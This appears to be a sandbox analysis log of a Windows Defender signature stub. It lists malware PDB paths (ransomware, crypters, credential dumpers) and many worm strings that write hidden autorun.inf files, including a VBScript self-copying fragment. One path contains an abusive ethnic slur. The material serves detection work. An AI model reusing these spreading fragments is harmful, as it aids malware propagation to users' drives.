Source:	Binary string: SkypeTOPA\obj\Debug\PnonaSkype.pdb source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: \ValhallaCrypter\ValhallaStub\Debug\ValhallaStub.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: \Release\shellcode.pdbxB source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: PCHunter64.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processtopology-obsolete-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18345017281.00000138BCDCB000.00000004.00000001.sdmp
Source:	Binary string: rasautou.pdb0 source: MpSigStub.exe, 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp
Source:	Binary string: samlib.pdb source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp
Source:	Binary string: csgoInjector.pdbx source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp
Source:	Binary string: MsMpEngCP.pdbGCTL source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdbx source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp
Source:	Binary string: DebugRelease\Form1.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: ntoskrnl.pdb source: MpSigStub.exe, 00000026.00000003.18308141829.00000138BCCD6000.00000004.00000001.sdmp
Source:	Binary string: SAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: MpAdlStub.pdbGCTL source: mpam-25cd2963.exe, 00000025.00000000.18201763876.00007FF7202FF000.00000002.00020000.sdmp
Source:	Binary string: feclient.pdb source: MpSigStub.exe, 00000026.00000003.18332439507.00000138BD299000.00000004.00000001.sdmp
Source:	Binary string: \regentry.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: \ircBot\ircBot\obj\Release\LolCache.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: Release\NTDSDumpEx.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: \bd2\master\bin\x64\Debug\bd2.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: blackbox.pdbyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy source: MpSigStub.exe, 00000026.00000003.18339634370.00000138BD24F000.00000004.00000001.sdmp
Source:	Binary string: \CCC\obj\Debug\CCC.pdbx source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: /dQWPICl_Hude1v.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: PasswordFox.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: \GG-Ransomware-master\GG ransomware\GG ransomware\obj\Debug\Ransom.pdb] source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp
Source:	Binary string: SuzanDLL\Release\suzanw.pdbx source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \myservice_chrome_svc.pdb source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: winsta.pdb source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: 'C:\postmaster\merge\Peasants\Billy.pdb source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp
Source:	Binary string: kill\yourself\@YongruiTan\chinese\idiot.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: U,.+:\\src\\tcrypt\\Release\\s_(high\|low).pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \Deonan\Release\Deonan.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: :\VC5\release\kinject.dll.pdb source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp
Source:	Binary string: BTR.pdb source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: userenv.pdb3 source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-2-0.pdb source: MpSigStub.exe, 00000026.00000003.18345017281.00000138BCDCB000.00000004.00000001.sdmp
Source:	Binary string: ApplyUpdate.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: C:\projects\FinalInstaller\finalinstaller\FinalInstaller\obj\imali_release\FinalInstaller_dotnet4.pdb source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: Elevated_MpMiniSigStub.pdb source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp
Source:	Binary string: \SharPersist.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \Release\Skype Utility.pdb source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: WizzByPass.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: iwJL##$@#*$^#%@!^$.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: CustomPlayback*\\Release\\CustomPlayback\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: Corona.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: tkDecript.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: d:\Autobuild\Work\BrowserExtensions\src\NSISCouponsPlugin\bin\Win32\Release\NSISCouponsPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: C:\\Git\\[a-z]([a-z]{3,10})\\.{0,20}(Debug\|Release).{0,20}\\[A-Z]\1(Exe\|Dll)\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: Release\TeamViewer.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: \Razvan\Desktop\Oh yeah\photo\photo\obj\Debug\leagueoflegends.pdb source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp
Source:	Binary string: WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: <Projects\CreateMessage\TestMessage\obj\Debug\ivtExchange.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp

Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: \autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: line1 = "[autorun]" && line2 = "open = System\DriveGuard\DriveProtect.exe -run
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: filesetattrib, -RASH, %thsdrv%\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: *filesetattrib, -RASH, %thsdrv%\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	Binary or memory string: copy/b%systemroot%\system32\autorun.cmd.echo[autorun]>autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	Binary or memory string: copy/b%systemroot%\system32\autorun.cmd.echo[autorun]>autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	Binary or memory string: Ecopy/b%systemroot%\system32\autorun.cmd.echo[autorun]>autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	Binary or memory string: Ecopy/b%systemroot%\system32\autorun.cmd.echo[autorun]>autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	Binary or memory string: autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	Binary or memory string: autorun.infx
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	Binary or memory string: [autorun];
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	Binary or memory string: x7[autorun];
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	Binary or memory string: %windir%\system32\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: :\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: [autorun]Open = action=Abrir carpeta para ver archivos
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: I[autorun]
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: [AutoRun]
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: [Autorun]
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: \Autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	Binary or memory string: [autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	Binary or memory string: /[autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	Binary or memory string: X:\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	Binary or memory string: .vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	Binary or memory string: /cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	Binary or memory string: +/cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	Binary or memory string: [autorun]open=avm10\avm10stakakodimolim.exe
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	Binary or memory string: -[autorun]open=avm10\avm10stakakodimolim.exe
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	Binary or memory string: copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	Binary or memory string: 8copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: cmd /c del /a autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: cmd /c del /a autorun.inf]
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	Binary or memory string: [AutoRun]
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: c:\windows\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	Binary or memory string: >> autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	Binary or memory string: .exe -h -s -r autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	Binary or memory string: shell\open=Open >> autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: [autorun]@#Open=tool.exe@#Shellexecute=tool.exe@#Shell
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: 6[autorun]@#Open=tool.exe@#Shellexecute=tool.exe@#Shell
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: [autorun]]
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: c:\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: shell\install\command=foto.exe>>%co%autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: 1shell\install\command=foto.exe>>%co%autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: in(cdefghijklmnopqrstuvwxyz)doxcopy/h/y/r/kautorun.inf%%
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: [autorun]open=shell\open=(&o)shell\open\command=s-
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: f[autorun]open=shell\open=(&o)shell\open\command=s-
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	Binary or memory string: torun.infshell\open\command=virus.exe[AutoRun]\virus.exe
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: (/c echo [autorun] >>
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: AutoRun.infd
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: AutoRun.infd2Program Files\Common Files\Microsoft Shared\MSINFO
Source: MpSigStub.exe, 00000026.00000003.18292462058.00000138BDF8A000.00000004.00000001.sdmp	Binary or memory string: %windir%\system32\win.dll\reg.bkp\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: [autorun]shell\open\command=d:\systemvolumeinformation.exeshell\explore\command=d:\systemvolumeinformation.exe
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: p[autorun]shell\open\command=d:\systemvolumeinformation.exeshell\explore\command=d:\systemvolumeinformation.exe
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: [autorun]open=service.exeshell\open=(&o)shell\open\command=service.exeshell\open\default=1shell\explore=(&x)shell\explore\command=service.exe
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: :\autorun.infopenAutoRun]
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: [autorun]shellexecute=speedkill3.vbsaction=icon=1.icolabel=flesh
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: B[autorun]shellexecute=speedkill3.vbsaction=icon=1.icolabel=flesh
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: 'kill_del(, a_loopfield ":\autorun.inf")
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: %TsDv%\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: [autorun]ACTION=Open USB Driveopen=
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: filesetattrib, +RASH, %TsDv%\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: %A_LoopField%:\AutoRun.inf
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: AUTORUN.INF
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: [AUTORUN]
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: AUTORUN.INF[AUTORUN]
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: AUTORUN.INF[AUTORUN]
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: C:\TEMP\\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: C:\TEMP\\autorun.inf]
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: v[autorun];
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: %sautorun.inf
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: deviceid&"\cysset.exe","-a+hsr")$file=fileopen($objevent.targetinstance.deviceid&"\autorun.inf"
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: adeviceid&"\cysset.exe","-a+hsr")$file=fileopen($objevent.targetinstance.deviceid&"\autorun.inf"
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: :\Autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	Binary or memory string: ;<br/>[autorun]<br/>open=terserah.exe<br/>shellexecute=terserah.exe<br/>action=openfoldert
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	Binary or memory string: t;<br/>[autorun]<br/>open=terserah.exe<br/>shellexecute=terserah.exe<br/>action=openfoldert
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: %s\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: AutoRun.inf
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: AutoRun.inf]
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: setaq=fso.getfile(status)iffso.fileexists(tmpt)thenfso.getfile(tmpt).attributes=0aq.copytmpt,truesetaq=fso.getfile(tmpt)aq.attributes=39anv=tmp+"\auto.exe"ifnotfso.fileexists(anv)thenaq.copyanvsetauto=fso.getfile(anv)auto.attributes=0setaut=fso.opentextfile(tmp+an,2,true,0)isi="[autorun]>open=wscript.exe//e:vbscriptthumb.dbauto>shell\open=open>shell\open\command=wscript.exe//e:vbscriptthumb.dbauto>shell\open\default=1>shell\explore=explore>shell\explore\command=wscript.exe//e:vbscriptthumb.dbauto
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: :\AutoRun.inf
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: %c:\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\Runkrag%c:\autorun.inf[AutoRun]
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\Runkrag%c:\autorun.inf[AutoRun]
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: [Autorun]]
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: [autorun]d$open = autorun.exed4shellexecute = autorun.exed
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	Binary or memory string: [autorun]open=
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: [autorun]]
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: Y[autorun]
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: '[autorun]
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: 3:\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: S[autorun]
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: E[autorun]
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: G[autorun]
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: [autorun]shell\explore\command=
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: D:\Autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: M:\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: atr="[autorun]"&vbcrlf&"shellexecute=wscript.exe/e:vbs
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: ?atr="[autorun]"&vbcrlf&"shellexecute=wscript.exe/e:vbs
Source: MpSigStub.exe, 00000026.00000003.18308141829.00000138BCCD6000.00000004.00000001.sdmp	Binary or memory string: docopy/yautorun.inf%%x:autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: echo [AutoRun] > %%
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: filesetattrib($var[$i]&"\autorun.inf","-hsr
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: \|filesetattrib($var[$i]&"\autorun.inf","-hsr
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: =fileopen($var[$i]&"\autorun.inf",10)filewrite($
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: ,"[autorun]"&@crlf)
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: [autorun]action=openshellexecute=
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: 0AutoRun.inf
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: 0[AutoRun]
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: \sysautorun.inf
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: \sysautorun.inf]
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: [Autorun]
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: %sAutoRun.inf
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: %s\AutoRun.inf

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpavdlta.vdm	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\	Jump to behavior

